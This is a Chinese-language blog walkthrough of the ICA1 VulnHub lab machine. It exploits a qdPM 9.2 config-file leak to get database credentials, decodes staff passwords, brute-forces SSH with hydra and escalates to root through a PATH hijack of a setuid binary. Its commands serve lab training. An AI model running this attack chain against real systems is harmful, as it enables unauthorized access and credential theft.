<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="主机发现arp-scan -l   端口扫描nmap -Pn -p- 192.168.62.182   开放了22、80、3306端口 访问80端口，是一个登录界面   qdPM是一个开源的项目管理系统，基于Symfony框架+PHP&#x2F;MySQL开发，可以看到qdPM的版本为9.2 漏洞发现搜索一下exploit-db看看有没有公开的exp  可以看到这个版本存在数据库敏感信息泄露，可以未授权获取">
<meta property="og:type" content="article">
<meta property="og:title" content="ICA1 VulnHub Walkthrough">
<meta property="og:url" content="http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/index.html">
<meta property="og:site_name" content="colind0pe&#39;s blog">
<meta property="og:description" content="主机发现arp-scan -l   端口扫描nmap -Pn -p- 192.168.62.182   开放了22、80、3306端口 访问80端口，是一个登录界面   qdPM是一个开源的项目管理系统，基于Symfony框架+PHP&#x2F;MySQL开发，可以看到qdPM的版本为9.2 漏洞发现搜索一下exploit-db看看有没有公开的exp  可以看到这个版本存在数据库敏感信息泄露，可以未授权获取">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/11/01/DtOf6MJVR5ndoGe.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/xCtO6cIAsQMSLDi.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/1ejgDTcrmNXdtRw.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/yZIxHGg2QtN9LiS.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/6NC3oaG9FzRYWrl.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/4WVgx7HBS19dC2P.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/CGJbOxwdtpsjXzD.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/wFHBokpdDs89Aj3.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/QaPujeoxcKYhXGm.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/ljuvOXPLYSUmhd5.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/cskMQEIqhPKT2fY.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/rUxToiE435wZ62q.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/tCaRQhxnyWjlABZ.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/i5gulQ2FmUo9j6b.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/o3u5HCDSTckYPmG.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/BsXuYOF3ymfWdNl.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/x7yHcPQhgoUrDG2.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/z4WNPo1MdavIbrs.png">
<meta property="og:image" content="https://i.loli.net/2021/11/01/yciWRaIrQzpNfk3.png">
<meta property="article:published_time" content="2021-11-01T06:35:38.000Z">
<meta property="article:modified_time" content="2021-12-25T12:19:50.095Z">
<meta property="article:author" content="colind0pe">
<meta property="article:tag" content="VulnHhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/11/01/DtOf6MJVR5ndoGe.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>ICA1 VulnHub Walkthrough</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2021/12/02/SSH%E8%BD%AC%E5%8F%91%E5%92%8Ciptables%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2021/10/14/driftingblues4-VulnHub-Walkthrough/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&text=ICA1 VulnHub Walkthrough"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&is_video=false&description=ICA1 VulnHub Walkthrough"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ICA1 VulnHub Walkthrough&body=Check out this article: http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&name=ICA1 VulnHub Walkthrough&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&t=ICA1 VulnHub Walkthrough"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">主机发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="toc-number">3.</span> <span class="toc-text">漏洞发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="toc-number">5.</span> <span class="toc-text">SSH密码爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">6.</span> <span class="toc-text">权限提升</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        ICA1 VulnHub Walkthrough
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">colind0pe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-11-01T06:35:38.000Z" itemprop="datePublished">2021-11-01</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/VulnHhub/" rel="tag">VulnHhub</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><pre><code>arp-scan -l
</code></pre>
<p><img src="https://i.loli.net/2021/11/01/DtOf6MJVR5ndoGe.png"></p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><pre><code>nmap -Pn -p- 192.168.62.182
</code></pre>
<p><img src="https://i.loli.net/2021/11/01/xCtO6cIAsQMSLDi.png"></p>
<p>开放了22、80、3306端口</p>
<p>访问80端口，是一个登录界面</p>
<img src="https://i.loli.net/2021/11/01/1ejgDTcrmNXdtRw.png" style="zoom:80%;" />

<p>qdPM是一个开源的项目管理系统，基于<a target="_blank" rel="noopener" href="http://www.oschina.net/p/symfony">Symfony</a>框架+PHP/MySQL开发，可以看到qdPM的版本为9.2</p>
<h3 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h3><p>搜索一下exploit-db看看有没有公开的exp</p>
<p><img src="https://i.loli.net/2021/11/01/yZIxHGg2QtN9LiS.png"></p>
<p>可以看到这个版本存在数据库敏感信息泄露，可以未授权获取数据库连接信息和密码</p>
<p>看一下利用方式</p>
<p><img src="https://i.loli.net/2021/11/01/6NC3oaG9FzRYWrl.png"></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>我们可以通过访问<code>http://&lt;website&gt;/core/config/databases.yml</code>来下载包含数据库连接信息和密码的yml文件</p>
<img src="https://i.loli.net/2021/11/01/4WVgx7HBS19dC2P.png" style="zoom:80%;" />

<p>通过访问<code>http://192.168.62.182/core/config/databases.yml</code>成功得到了数据库的用户名和密码<code>qdpmadmin:UcVQCMQk2STVeS6J</code></p>
<p>接下来尝试登录数据库，进一步获取敏感信息</p>
<pre><code>mysql -u qdpmadmin -h 192.168.62.182 -p
</code></pre>
<img src="https://i.loli.net/2021/11/01/CGJbOxwdtpsjXzD.png" style="zoom:80%;" />

<p>在<code>staff</code>数据库中找到了五组用户名和密码，密码是经过编码加密的</p>
<img src="https://i.loli.net/2021/11/01/wFHBokpdDs89Aj3.png" style="zoom:80%;" />

<h3 id="SSH密码爆破"><a href="#SSH密码爆破" class="headerlink" title="SSH密码爆破"></a>SSH密码爆破</h3><p>将经过base64编码的密码字符串解码一下，记录到一个文本中</p>
<p><img src="https://i.loli.net/2021/11/01/QaPujeoxcKYhXGm.png"></p>
<p>将用户名也记录到一个文本中</p>
<p><img src="https://i.loli.net/2021/11/01/ljuvOXPLYSUmhd5.png"></p>
<p>用账户密码来爆破80端口的登陆界面无果，只能尝试爆破22端口了</p>
<pre><code>hydra -L user -P password ssh://192.168.62.182 -f
</code></pre>
<p><img src="https://i.loli.net/2021/11/01/cskMQEIqhPKT2fY.png"></p>
<p><img src="https://i.loli.net/2021/11/01/rUxToiE435wZ62q.png"></p>
<p>成功得到了两组ssh的用户名和密码，尝试登录ssh</p>
<p>先登录<code>travis</code>账号，获取到了第一个flag</p>
<p><img src="https://i.loli.net/2021/11/01/tCaRQhxnyWjlABZ.png"></p>
<p>再登录<code>dexter</code>，看到有提示，应该是要利用可执行文件来提权</p>
<img src="https://i.loli.net/2021/11/01/i5gulQ2FmUo9j6b.png" style="zoom: 80%;" />

<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>先查看一下有执行权限的文件</p>
<pre><code>find / -perm -u=s 2&gt;/dev/null
</code></pre>
<p><img src="https://i.loli.net/2021/11/01/o3u5HCDSTckYPmG.png"></p>
<p>用strings查看一下<code>/opt/get_access</code></p>
<p><img src="https://i.loli.net/2021/11/01/BsXuYOF3ymfWdNl.png"></p>
<p>可以推测执行<code>/opt/get_access</code>时会进行<code>setuid</code>操作，接着会执行<code>cat</code>命令</p>
<p>为了证明我们的推测，我们对<code>get_access</code>进行反编译，我们通过伪代码可以比较清晰地看到，当执行<code>get_access</code>时会执行<code>setuid(0)</code>，再执行<code>cat</code>命令打印系统信息,并且执行的<code>cat</code>命令是没有指定路径的</p>
<img src="https://i.loli.net/2021/11/01/x7yHcPQhgoUrDG2.png" style="zoom: 80%;" />

<p>接下来我们可以通过伪造一个文件名为<code>cat</code>的可执行文件，文件内容为<code>/bin/bash</code>，并将文件路径设置为环境变量，这样执行<code>get_access</code>的时候，就会执行我们伪造的<code>cat</code>文件，从而使我们获得root权限</p>
<pre><code>echo &#39;/bin/bash&#39; &gt; /tmp/cat
chmod +x /tmp/cat 
echo $PATH
export PATH=/tmp:$PATH
/opt/get_access
</code></pre>
<p><img src="https://i.loli.net/2021/11/01/z4WNPo1MdavIbrs.png"></p>
<p>我们已经成功得到了root权限，最后我们通过<code>more</code>命令获取第二个flag</p>
<p><img src="https://i.loli.net/2021/11/01/yciWRaIrQzpNfk3.png"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">主机发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="toc-number">3.</span> <span class="toc-text">漏洞发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="toc-number">5.</span> <span class="toc-text">SSH密码爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">6.</span> <span class="toc-text">权限提升</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&text=ICA1 VulnHub Walkthrough"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&is_video=false&description=ICA1 VulnHub Walkthrough"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ICA1 VulnHub Walkthrough&body=Check out this article: http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&title=ICA1 VulnHub Walkthrough"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&name=ICA1 VulnHub Walkthrough&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/11/01/ICA1-VulnHub-Walkthrough/&t=ICA1 VulnHub Walkthrough"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2022
    colind0pe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
